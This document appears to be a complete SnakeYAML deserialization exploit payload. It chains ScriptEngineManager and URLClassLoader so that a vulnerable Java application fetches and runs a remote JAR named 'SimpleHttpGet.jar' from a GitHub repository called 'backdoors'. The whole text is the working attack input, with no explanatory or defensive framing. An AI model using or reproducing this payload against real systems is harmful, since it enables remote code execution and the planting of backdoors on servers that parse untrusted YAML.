!!javax.script.ScriptEngineManager
javax.script.ScriptEngineManager: !!java.net.URLClassLoader
  uRLs:
    - !!java.net.URL "https://github.com/elefantesagradodeluzinfinita/backdoors/raw/main/SimpleHttpGet.jar"
